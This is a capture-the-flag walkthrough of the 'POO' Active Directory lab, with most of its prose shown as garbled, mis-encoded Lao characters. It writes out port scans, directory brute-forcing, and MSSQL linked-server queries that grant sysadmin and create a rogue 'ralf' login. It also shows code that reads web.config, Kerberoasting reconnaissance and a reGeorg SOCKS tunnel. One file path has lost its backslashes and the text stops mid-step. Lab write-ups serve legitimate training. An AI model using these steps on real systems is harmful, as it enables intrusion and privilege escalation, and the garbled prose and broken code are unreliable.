เปเบเบเบปเบเบเบงเบฒเบกเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเบฐเบงเบดเปเบเบฒเบฐ passage เบเบญเบเบเปเปเบเบฝเบเปเบเปเปเบเบทเปเบญเบเบเบฑเบ, เปเบเปเปเบเบฑเบเบซเปเบญเบเบเบปเบเบฅเบญเบ mini เบเบฑเบเบซเบกเบปเบเบเบฒเบเบชเบฐเบเบฒเบเบเบตเป
เบเบฑเปเบเบเบตเปเปเบเปเบเปเบฒเบงเปเบงเปเปเบเบเปเบฒเบญเบฐเบเบดเบเบฒเบ, POO เบเบทเบเบญเบญเบเปเบเบเบกเบฒเปเบเบทเปเบญเบเบปเบเบชเบญเบเบเบฑเบเบชเบฐเปเบเบเบธเบเบเบฑเปเบเบเบญเบเบเบญเบเบเบฒเบเปเบเบกเบเบตเปเบเบชเบฐเบเบฒเบเปเบงเบเบฅเปเบญเบก Active Directory เบเบฐเบซเบเบฒเบเบเปเบญเบ. เปเบเบปเปเบฒเบซเบกเบฒเบเปเบกเปเบเปเบเบทเปเบญเบเบฐเบเบตเบเบฐเบเบญเบกเปเบเบฑเบเปเบเบปเปเบฒเบเบฒเบเบเบตเปเบชเบฒเบกเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเป, เบเบฐเบซเบเบฒเบเบชเบดเบเบเบดเบเบดเปเบชเบ, เปเบฅเบฐเบชเบธเบเบเปเบฒเบเบเบฐเบเบตเบเบฐเบเบญเบกเปเบเปเบกเบเบเบฑเบเบซเบกเบปเบเปเบเบเบฐเบเบฐเบเบตเปเปเบเบฑเบเบเปเบฒ 5 เบเบธเบ.
เบเบฒเบเปเบเบทเปเบญเบกเบเปเปเบเบฑเบเบซเปเบญเบเบเบปเบเบฅเบญเบเปเบกเปเบเบเปเบฒเบ VPN. เบกเบฑเบเปเบเบฐเบเปเบฒเปเบซเปเบเปเปเปเบเบทเปเบญเบกเบเปเปเบเบฒเบเบเบญเบกเบเบดเบงเปเบเบตเบเปเบญเบเปเบฎเบฑเบเบงเบฝเบเบซเบผเบทเบเบฒเบเปเบเบปเปเบฒเบเบฒเบเบเปเบญเบเบเบตเปเบกเบตเบเปเปเบกเบนเบเบเบตเปเบชเปเบฒเบเบฑเบเบชเปเบฒเบฅเบฑเบเบเปเบฒเบ, เบเบฑเบเบเบฑเปเบเปเบเปเบเปเบฒเบเบชเบดเปเบเบชเบธเบเบฅเบปเบเปเบเปเบเบทเบญเบเปเบฒเบเบชเปเบงเบเบเบปเบงเบเบฑเบเบเบนเปเบเบตเปเบฎเบนเปเบเบฒเบเบชเบดเปเบเบเบฒเบเบขเปเบฒเบเปเบเบเปเบฒเบเบเบงเบฒเบกเบเบญเบเปเบเบเบญเบเบเปเปเบกเบนเบ :)
เบเปเปเบกเบนเบเบญเบปเบเบเบฒเบเบเบฑเบเบเบฑเปเบ
เบเบฑเปเบเบเบฑเปเบ, เบเปเบฒเบเบชเบฒเบกเบฒเบเบเบญเบเบซเบฒเบเบปเบเบเบงเบฒเบกเปเบซเบกเป, เบเบญเบเปเบงเปเบฅเบฐเบเปเปเบกเบนเบเบญเบทเปเบเป, เบเปเบฒเบเบฐเปเบเบปเปเบฒเปเบเปเบชเปเบฒเบ
เบเปเปเบกเบนเบเบเบฑเบเบซเบกเบปเบเปเบกเปเบเบเปเบฒเบชเบฐเปเบซเบเบตเบชเปเบฒเบฅเบฑเบเบเบธเบเบเบฐเบชเบปเบเบเบฒเบเบชเบถเบเบชเบฒเปเบเบปเปเบฒเบเบฑเปเบ. เบเบนเปเบเบฝเบเปเบญเบเบฐเบชเบฒเบเบชเบฐเบเบฑเบเบเบตเปเบเปเปเบเบญเบกเบฎเบฑเบเบเบงเบฒเบกเบฎเบฑเบเบเบดเบเบเบญเบเบเปเปเบเบงเบฒเบกเปเบชเบเบซเบฒเบเบเบตเปเปเบเบตเบเบเบฒเบเบเบนเปเปเบเบเปเปเบเบฒเบกเบเบตเปเปเบเบฑเบเบเบปเบเบกเบฒเบเบฒเบเบเบฒเบเบเปเบฒเปเบเปเบเบงเบฒเบกเบฎเบนเปเปเบฅเบฐเปเบเบฑเบเบเบดเบเบเบตเปเปเบเปเบฎเบฑเบเบเบฒเบเบเบฒเบเบชเบถเบเบชเบฒเปเบญเบเบฐเบชเบฒเบเบเบตเป.
Intro
เปเบเบกเบชเบธเบเบเปเบฒเบเบเบตเปเบเบฐเบเบญเบเบเปเบงเบเบชเบญเบเปเบเบทเปเบญเบเบเบฑเบ, เปเบฅเบฐเบกเบต 5 เบเบธเบ.
เบฅเบฒเบเบฅเบฐเบญเบฝเบ เปเบฅเบฐเบเบตเปเบขเบนเปเบเบญเบเปเบเบปเปเบฒเบเบฒเบเบเบตเปเบกเบตเบขเบนเปเปเบกเปเบเปเบซเป.
เปเบซเปเปเบฅเบตเปเบกเบเบปเปเบ!
เบเบธเบ Recon
เปเบเบทเปเบญเบเบเบตเปเบกเบตเบเบตเปเบขเบนเป IP เบเบญเบ 10.13.38.11, เบเบตเปเบเปเบญเบเปเบเบตเปเบกเปเบชเป /etc/hosts.
10.13.38.11 poo.htb
เบเปเบญเบเบญเบทเปเบ เปเบปเบ, เบเบงเบเปเบฎเบปเบฒเบชเบฐเปเบเบเบเบญเบเปเบเบตเบ. เบเบฑเบเบเบฑเปเบเปเบเปเบเบฒเบเบชเบฐเปเบเบเบเบญเบเบเบฑเบเบซเบกเบปเบเบเปเบงเบ nmap เปเบเปเปเบงเบฅเบฒเบเบปเบ, เบเปเบฒเบญเบดเบเบเปเบญเบเบเบฐเปเบฎเบฑเบเบชเบดเปเบเบเบตเปเปเบเบเปเบเป masscan. เบเบงเบเปเบฎเบปเบฒเบชเบฐเปเบเบเบเบธเบเบเบญเบ TCP เปเบฅเบฐ UDP เบเบฒเบเบเบฒเบเปเบเปเบเบญเบ tun0 เบเปเบงเบเบเบงเบฒเบกเปเบง 500 เปเบเบฑเบเปเบเบฑเบเบเปเปเบงเบดเบเบฒเบเบต.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
เปเบเบเบฑเบเบเบธเบเบฑเบ, เปเบเบทเปเบญเปเบซเปเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเบฅเบฒเบเบฅเบฐเบญเบฝเบเปเบเบตเปเบกเปเบเบตเบกเบเปเบฝเบงเบเบฑเบเบเบฒเบเบเปเบฅเบดเบเบฒเบเบเบตเปเบเปเบฒเปเบเบตเบเบเบฒเบเบขเบนเปเปเบเบเบญเบ, เปเบซเปเบเปเบฒเปเบเบตเบเบเบฒเบเบชเบฐเปเบเบเบเปเบงเบเบเบฒเบเปเบฅเบทเบญเบ -A.
nmap -A poo.htb -p80,1433
เบเบฑเปเบเบเบฑเปเบ, เบเบงเบเปเบฎเบปเบฒเบกเบตเบเปเบฅเบดเบเบฒเบ IIS เปเบฅเบฐ MSSQL. เปเบเบเปเบฅเบฐเบเบตเบเบตเป, เบเบงเบเปเบฎเบปเบฒเบเบฐเบเบญเบเบซเบฒเบเบทเป DNS เบเบตเปเปเบเปเบเบดเบเบเบญเบเปเบเปเบกเบเปเบฅเบฐเบเบญเบกเบเบดเบงเปเบเบต. เปเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเปเบงเบฑเบเปเบเบเป, เบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบเบเบฒเบเบเปเบญเบเบฎเบฑเบเปเบเบเบซเบเปเบฒเบเปเบฒเบญเบดเบเบเบญเบ IIS.
เปเบซเปเปเบเปเบเบเบเปเบฒเบเปเบเปเบฅเบเบฐเบเปเบฅเบต. เบเปเบญเบเปเบเป gobuster เบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบตเป. เปเบเบเบฒเบฅเบฒเบกเบดเปเบเบตเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเบตเปเบเบญเบเบเปเบฒเบเบงเบเบเบญเบเบเบฐเบเบนเป 128 (-t), URL (-u), เบงเบฑเบเบเบฐเบเบฒเบเบธเบเบปเบก (-w) เปเบฅเบฐเบชเปเบงเบเบเบฐเบซเบเบฒเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเบชเบปเบเปเบ (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
เบเบตเปเปเบฎเบฑเบเปเบซเปเบเบงเบเปเบฎเบปเบฒเบกเบตเบเบฒเบเบเบงเบเบชเบญเบ HTTP เบชเปเบฒเบฅเบฑเบเปเบเปเบฅเบเบฐเบเปเบฅเบต /admin, เปเบเบฑเปเบเบเบฝเบงเบเบฑเบเบเบฑเบเบเปเบฅเบดเบเบฒเบ desktop เบเบตเปเบชเบฒเบกเบฒเบเปเบเบปเปเบฒเปเบเบดเบเปเบเบฅเป .DS_Store. .DS_Store เปเบกเปเบเปเบเบฅเปเบเบตเปเปเบเบฑเบเบฎเบฑเบเบชเบฒเบเบฒเบเบเบฑเปเบเบเปเบฒเปเบเบเบเบณเบเบปเบเปเบญเบเบชเบณเบฅเบฑเบเปเบเบเปเบเบต เปเบเบฑเปเบ: เบฅเบฒเบเบเบทเปเปเบเบฅเป, เบชเบฐเบเบฒเบเบเบตเปเปเบญเบเบญเบ เปเบฅเบฐเบฎเบนเบเบเบทเปเบเบซเบผเบฑเบเบเบตเปเปเบฅเบทเบญเบ. เปเบเบฅเปเบเบฑเปเบเบเปเบฒเบงเบญเบฒเบเบเบฐเบชเบดเปเบเบชเบธเบเบขเบนเปเปเบเปเบเปเบฅเบเบฐเบเปเบฅเบตเบเบญเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเปเบงเบฑเบเปเบเบเปเบเบญเบเบเบนเปเบเบฑเบเบเบฐเบเบฒเปเบงเบฑเบ. เบเปเบงเบเบงเบดเบเบตเบเบตเป, เบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบเบเปเปเบกเบนเบเบเปเบฝเบงเบเบฑเบเปเบเบทเปเบญเปเบเบเบญเบเปเบเปเบฅเบเบฐเบเปเบฅเบต. เปเบเบทเปเบญเปเบฎเบฑเบเบชเบดเปเบเบเบตเป, เบเปเบฒเบเบชเบฒเบกเบฒเบเบเปเบฒเปเบเป
python3 dsstore_crawler.py -i http://poo.htb/
เบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบเปเบเบทเปเบญเปเบเบเบญเบเปเบเปเบฅเบเบฐเบเปเบฅเบต. เบชเบดเปเบเบเบตเปเบซเบเปเบฒเบชเบปเบเปเบเบเบตเปเบชเบธเบเบขเบนเปเบเบตเปเบเบตเปเปเบกเปเบเปเบเปเบฅเบเบฐเบเปเบฅเบต / dev, เบเบฒเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเปเบเบดเปเบเปเบซเบผเปเบเปเบฅเบฐเปเบเบฅเป db เปเบเบชเบญเบเบชเบฒเบเบฒ. เปเบเปเบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเบเปเบฒเปเบเป 6 เบเบปเบงเบญเบฑเบเบชเบญเบเบเปเบฒเบญเบดเบเบเบญเบเบเบทเปเปเบเบฅเปเปเบฅเบฐเปเบเปเบฅเบเบฐเบเปเบฅเบตเบเปเบฒเบเปเบฅเบดเบเบฒเบเบกเบตเบเบงเบฒเบกเบชเปเบฝเบเบเปเป IIS ShortName. เบเปเบฒเบเบชเบฒเบกเบฒเบเบเบงเบเบชเบญเบเบเปเบญเบเปเบซเบงเปเบเบตเปเปเบเบเปเบเป
เปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเบเบญเบเบซเบฒเปเบเบฅเปเบเปเปเบเบงเบฒเบกเบซเบเบถเปเบเบเบตเปเปเบฅเบตเปเบกเบเบปเปเบเบเปเบงเบ "poo_co". เบเปเปเบฎเบนเปเบงเปเบฒเบเบฐเปเบฎเบฑเบเปเบเบงเปเบเบเปเปเปเบ, เบเปเบฒเบเบฐเปเบเบปเปเบฒเบเบฝเบเปเบเปเปเบฅเบทเบญเบเบเปเบฒเบเบฑเบเบซเบกเบปเบเบเบตเปเปเบฅเบตเปเบกเบเบปเปเบเบเปเบงเบ "co" เบเบฒเบเบงเบฑเบเบเบฐเบเบฒเบเบธเบเบปเบก.
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
เปเบฅเบฐเปเบฎเบฑเบเบเปเบณเบเบฑเบ wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
เปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเบเบญเบเบซเบฒเบเปเบฒเบเบตเปเบเบทเบเบเปเบญเบ! เบเบงเบเปเบฎเบปเบฒเปเบเบดเปเบเปเบเบฅเปเบเบตเป, เบเบฑเบเบเบถเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบง (เบเบฒเบเบเบฑเบเบชเบดเบเปเบเบเบเบฒเบฅเบฒเบกเบดเปเบเบต DBNAME, เบเบงเบเปเบเบปเบฒเบกเบฒเบเบฒเบ MSSQL).
เบเบงเบเปเบฎเบปเบฒเบเบญเบกเบเปเบฒเบเบปเบเบเบธเบเปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเบเปเบฒเบงเบซเบเปเบฒ 20%.
เบเบธเบ
เบเบงเบเปเบฎเบปเบฒเปเบเบทเปเบญเบกเบเปเปเบเบฑเบ MSSQL, เบเปเบญเบเปเบเป DBeaver.
เบเบงเบเปเบฎเบปเบฒเบเปเปเบเบปเบเบชเบดเปเบเบเบตเปเบซเบเปเบฒเบชเบปเบเปเบเปเบเบเบฒเบเบเปเปเบกเบนเบเบเบตเป, เปเบซเปเบเบงเบเปเบฎเบปเบฒเบชเปเบฒเบ SQL Editor เปเบฅเบฐเบเบงเบเปเบเบดเปเบเบงเปเบฒเบเบนเปเปเบเปเบกเบตเบซเบเบฑเบเปเบเป.
SELECT name FROM master..syslogins;
เบเบงเบเปเบฎเบปเบฒเบกเบตเบเบนเปเปเบเปเบชเบญเบเบเบปเบ. เปเบซเปเบเบงเบเปเบเบดเปเบเบชเบดเบเบเบดเบเบดเปเบชเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
เบเบฑเปเบเบเบฑเปเบ, เบเปเปเบกเบตเบชเบดเบเบเบดเบเบดเปเบชเบ. เปเบซเปเปเบเบดเปเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบตเปเปเบเบทเปเบญเบกเบเปเป, เบเปเบฒเบเบฐเปเบเบปเปเบฒเปเบเปเบเบฝเบเบเปเบฝเบงเบเบฑเบเปเบเบฑเบเบเบดเบเบเบตเปเบขเปเบฒเบเบฅเบฐเบญเบฝเบ
SELECT * FROM master..sysservers;
เบเบตเปเปเบกเปเบเบงเบดเบเบตเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเบญเบเบซเบฒ SQL Server เบญเบทเปเบ. เปเบซเปเบเบปเบเบชเบญเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบชเบฑเปเบเปเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบตเปเปเบเบเปเบเป openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
เปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเบเบฑเบเบชเบฒเบกเบฒเบเบชเปเบฒเบเบเบปเปเบเปเบกเปเบชเบญเบเบเบฒเบกเปเบเป.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
เบเบธเบเปเบกเปเบเบงเปเบฒเปเบกเบทเปเบญเบเบงเบเปเบฎเบปเบฒเปเบฎเบฑเบเบเบฒเบเบฎเปเบญเบเบเปเบเบฑเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบตเปเปเบเบทเปเบญเบกเบเปเป, เบเบฒเบเบฎเปเบญเบเบเปเบเบฐเบเบทเบเบเบฐเบเบดเบเบฑเบเปเบเบชเบฐเบเบฒเบเบเบฒเบเบเบญเบเบเบนเปเปเบเปเบญเบทเปเบ! เปเบซเปเปเบเบดเปเบเปเบเบชเบฐเบเบฒเบเบเบฒเบเบเบญเบเบเบนเปเปเบเปเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเปเบฒเบฅเบฑเบเปเบฎเบฑเบเบงเบฝเบเบขเบนเปเปเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบตเปเปเบเบทเปเบญเบกเบเปเป.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
เบเบญเบเบเบตเปเปเบซเปเปเบเบดเปเบเปเบเบชเบฐเบเบฒเบเบเบฒเบเปเบเบเบตเปเบเปเบฒเบฎเปเบญเบเบเปเบเบทเบเปเบฎเบฑเบเบเบฒเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบตเปเปเบเบทเปเบญเบกเบเปเปเบเบฑเบเบเบงเบเปเบฎเบปเบฒ!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
เบเบฑเปเบเบเบฑเปเบเบกเบฑเบเปเบกเปเบเบชเบฐเบเบฒเบเบเบฒเบ DBO เบเบตเปเบเบงเบเบเบฐเบกเบตเบชเบดเบเบเบดเบเบดเปเบชเบเบเบฑเบเบซเบกเบปเบ. เปเบซเปเบเบงเบเปเบเบดเปเบเบชเบดเบเบเบดเบเบดเปเบชเบเปเบเบเปเบฅเบฐเบเบตเบเบญเบเบเบฒเบเบฎเปเบญเบเบเปเบเบฒเบเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบเบเบตเปเปเบเบทเปเบญเบกเบเปเป.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
เบเบฑเปเบเบเบตเปเปเบเบปเปเบฒเบชเบฒเบกเบฒเบเปเบซเบฑเบเปเบเป, เบเบงเบเปเบฎเบปเบฒเบกเบตเบชเบดเบเบเบดเบเบดเปเบชเบเบเบฑเบเบซเบกเบปเบ! เปเบซเปเบชเปเบฒเบ admin เบเบญเบเบเบงเบเปเบฎเบปเบฒเปเบญเบเปเบเบเบเบตเป. เปเบเปเบเบงเบเปเบเบปเบฒเบเปเปเบญเบฐเบเบธเบเบฒเบเปเบซเปเบกเบฑเบเบเปเบฒเบ openquery, เปเบซเปเปเบฎเบฑเบเบกเบฑเบเบเปเบฒเบ EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
เปเบฅเบฐเปเบเบเบฑเบเบเบธเบเบฑเบเบเบงเบเปเบฎเบปเบฒเปเบเบทเปเบญเบกเบเปเปเบเบฑเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบเบญเบเบเบนเปเปเบเปเปเบซเบกเป, เบเบงเบเปเบฎเบปเบฒเบชเบฑเบเปเบเบเปเบซเบฑเบเบเบฒเบเบเปเปเบกเบนเบเบเบธเบเปเบซเบกเป.
เบเบงเบเปเบฎเบปเบฒเบกเบญเบเบเบธเบเบเบตเปเปเบฅเบฐเบเปเบฒเบงเบเปเปเปเบ.
เบเบธเบ BackTrack
เปเบซเปเปเบญเบปเบฒเปเบเบฐเปเบเบเปเบเป MSSQL, เบเปเบญเบเปเบเป mssqlclient เบเบฒเบเบเบธเบ impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
เบเบงเบเปเบฎเบปเบฒเบเปเบฒเปเบเบฑเบเบเปเบญเบเปเบเปเบฎเบฑเบเบฅเบฐเบซเบฑเบเบเปเบฒเบ, เปเบฅเบฐเบชเบดเปเบเบเปเบฒเบญเบดเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเปเบเปเบเบปเบเปเบฅเปเบงเปเบกเปเบเปเบงเบฑเบเปเบเบเป. เบเบฑเปเบเบเบฑเปเบ, เบเบงเบเปเบฎเบปเบฒเบเปเบญเบเบเบฒเบ config เปเบเบตเบเปเบงเบตเปเบงเบฑเบ (เบกเบฑเบเปเบเบฑเบเปเบเบเปเปเปเบเปเบเบตเปเบเบฐเบญเบญเบเบเบฒเบเปเบเบฐเบเบตเปเบชเบฐเบเบงเบเบชเบฐเบเบฒเบ, เปเบเบดเปเบเบเบทเบงเปเบฒเปเบเบงเปเบเปเบฒเบฅเบฑเบเปเบฅเปเบเบขเบนเป).
เปเบเปเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบเบเบทเบเบเบฐเบเบดเปเบชเบ. เปเบเบดเบเปเบกเปเบเบงเปเบฒเบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเบญเปเบฒเบเปเบเบฅเปเบเบฒเบ MSSQL, เบเบงเบเปเบฎเบปเบฒเบเบฝเบเปเบเปเบเปเบญเบเบเบฒเบเบฎเบนเปเบงเปเบฒเบเบฒเบชเบฒเบเบฒเบเบเบฝเบเปเบเบผเปเบเบผเบกเปเบเบเบทเบเบเบฑเปเบเบเปเบฒ. เปเบฅเบฐเปเบเปเบเปเบฅเบเบฐเบเปเบฅเบต MSSQL เบเบงเบเปเบฎเบปเบฒเบเบปเบเบงเปเบฒเบกเบต Python.
เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบ, เบเปเปเบกเบตเบเบฑเบเบซเบฒเปเบเบเบฒเบเบญเปเบฒเบเปเบเบฅเป web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
เบเปเบงเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบเบตเปเบเบปเบเปเบซเบฑเบ, เปเบเบซเบฒ /admin เปเบฅเบฐเปเบญเบปเบฒเบเบธเบ.
เบเบธเบเบเบฒเบ
เปเบเบเบงเบฒเบกเปเบเบฑเบเบเบดเบ, เบกเบตเบเบงเบฒเบกเบเปเปเบชเบฐเบเบงเบเบเบฒเบเบขเปเบฒเบเบเบฒเบเบเบฒเบเปเบเปเปเบเบงเป, เปเบเปเปเบเบดเปเบเบเปเบฒเบเบเบฒเบเบเบฑเปเบเบเปเบฒเปเบเบทเบญเบเปเบฒเบ, เบเบงเบเปเบฎเบปเบฒเบชเบฑเบเปเบเบเปเบซเบฑเบเบงเปเบฒ IPv6 เบเบฑเบเบเบทเบเบเปเบฒเปเบเป!
เปเบซเปเปเบเบตเปเบกเบเบตเปเบขเบนเปเบเบตเปเปเบชเป /etc/hosts.
dead:babe::1001 poo6.htb
เปเบซเปเบชเบฐเปเบเบเปเบเบปเปเบฒเบเบฒเบเบญเบตเบเบเบฑเปเบ, เปเบเปเปเบเป IPv6 protocol.
เปเบฅเบฐเบเบฒเบเบเปเบฅเบดเบเบฒเบ WinRM เปเบกเปเบเบกเบตเบขเบนเปเปเบเปเบฅเบเบฐ IPv6. เปเบซเปเปเบเบทเปเบญเบกเบเปเปเบเบฑเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเบเบตเปเบเบปเบเปเบซเบฑเบ.
เบกเบตเบเบธเบเบขเบนเปเปเบ desktop, เบเบงเบเปเบฎเบปเบฒเปเบญเบปเบฒเบกเบฑเบเปเบ.
P00ned เบเบธเบ
เบซเบผเบฑเบเบเบฒเบเบเปเบฒเปเบเบตเบเบเบฒเบ reconnaissance เบเปเบฝเบงเบเบฑเบเปเบเบปเปเบฒเบเบฒเบเบเบฒเบเบเปเบฒเปเบเป
setspn.exe -T intranet.poo -Q */*
เปเบซเปเบเปเบฒเปเบเบตเบเบเบฒเบเบเปเบฒเบชเบฑเปเบเบเปเบฒเบ MSSQL.
เบเบฒเบเบเปเบฒเปเบเปเบงเบดเบเบตเบเบฒเบเบเบตเป, เบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบ SPN เบเบญเบเบเบนเปเปเบเป p00_hr เปเบฅเบฐ p00_adm, เบเบถเปเบเบซเบกเบฒเบเบเบงเบฒเบกเบงเปเบฒเบเบงเบเปเบเบปเบฒเบกเบตเบเบงเบฒเบกเบชเปเบฝเบเบเปเปเบเบฒเบเปเบเบกเบเบตเปเบเบฑเปเบ Kerberoasting. เปเบเบชเบฑเปเบ, เบเบงเบเปเบฎเบปเบฒเบชเบฒเบกเบฒเบเปเบเปเบฎเบฑเบ hashes เบฅเบฐเบซเบฑเบเบเปเบฒเบเบเบญเบเปเบเบปเบฒเปเบเบปเปเบฒ.
เบเปเบฒเบญเบดเบเบเปเบฒเบเบเปเบฒเปเบเบฑเบเบเปเบญเบเปเบเปเบฎเบฑเบเปเบเบฐเบเบตเปเบซเบกเบฑเปเบเบเบปเบเปเบเบฑเบเบเบนเปเปเบเป MSSQL. เปเบเปเปเบเบทเปเบญเบเบเบฒเบเบเบงเบเปเบฎเบปเบฒเบเบทเบเบเปเบฒเบเบฑเบเปเบเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบ, เบเบงเบเปเบฎเบปเบฒเบกเบตเบเบฒเบเปเบเบทเปเบญเบกเบเปเปเบเบฑเบเปเบเบปเปเบฒเบเบฒเบเบเบฝเบเปเบเปเบเปเบฒเบเบเบญเบ 80 เปเบฅเบฐ 1433. เปเบเปเบกเบฑเบเปเบเบฑเบเปเบเปเบเป tunnel traffic เบเปเบฒเบ port 80! เบชเปเบฒเบฅเบฑเบเบเบฒเบเบเบตเปเบเบงเบเปเบฎเบปเบฒเบเบฐเปเบเป
เปเบเปเปเบกเบทเปเบญเบเบงเบเปเบฎเบปเบฒเบเบฐเบเบฒเบเบฒเบกเปเบเบปเปเบฒเบซเบฒเบกเบฑเบ, เบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบเบเปเปเบเบดเบเบเบฒเบ 404. เบเบตเปเบซเบกเบฒเบเบเบงเบฒเบกเบงเปเบฒเปเบเบฅเป *.aspx เบเปเปเปเบเปเบเบทเบเบเบฐเบเบดเบเบฑเบ. เปเบเบทเปเบญเปเบซเปเปเบเบฅเปเบเบตเปเบกเบตเบชเปเบงเบเบเบฐเบซเบเบฒเบเปเบซเบผเบปเปเบฒเบเบตเปเบเบทเบเบเบฐเบเบดเบเบฑเบ, เบเบดเบเบเบฑเปเบ ASP.NET 4.5 เบเบฑเปเบเบเปเปเปเบเบเบตเป.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
เปเบฅเบฐเปเบเบเบฑเบเบเบธเบเบฑเบ, เปเบกเบทเปเบญเบเบงเบเปเบฎเบปเบฒเปเบเบปเปเบฒเปเบเบดเบ tunnel.aspx, เบเบงเบเปเบฎเบปเบฒเปเบเปเบฎเบฑเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบเบงเปเบฒเบเบธเบเบชเบดเปเบเบเบธเบเบขเปเบฒเบเปเบกเปเบเบเปเบญเบกเบเบตเปเบเบฐเปเบ.
เปเบซเปเปเบเบตเบเบชเปเบงเบเบฅเบนเบเบเปเบฒเบเบญเบเปเบญเบฑเบเบเบฅเบดเปเบเบเบฑเบ, เปเบเบดเปเบเบเบฐเบชเบปเปเบเบเบฒเบเบเบฐเบฅเบฒเบเบญเบ. เบเบงเบเปเบฎเบปเบฒเบเบฐเบชเบปเปเบเบเปเปเบเบฒเบเบเบฐเบฅเบฒเบเบญเบเบเบฑเบเบซเบกเบปเบเบเบฒเบเบเบญเบ 5432 เปเบเบซเบฒเปเบเบทเปเบญเบเปเบกเปเบเปเบฒเบ.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
เปเบฅเบฐเบเบงเบเปเบฎเบปเบฒเปเบเป proxychains เปเบเบทเปเบญเบชเบปเปเบเบเบฒเบเบเบฐเบฅเบฒเบเบญเบเบเบญเบเปเบญเบฑเบเบเบฅเบดเปเบเบเบฑเบเปเบเปเปเบเบเบเปเบฒเบเบเบปเบงเปเบเบเบเบญเบเบเบงเบเปเบฎเบปเบฒ. เปเบซเปเปเบเบตเปเบกเบเบฃเบฑเบญเบเบเบตเบเบตเปเปเบชเปเปเบเบฅเปเบเบฒเบเบเบฑเปเบเบเปเบฒ /etc/proxychains.conf.
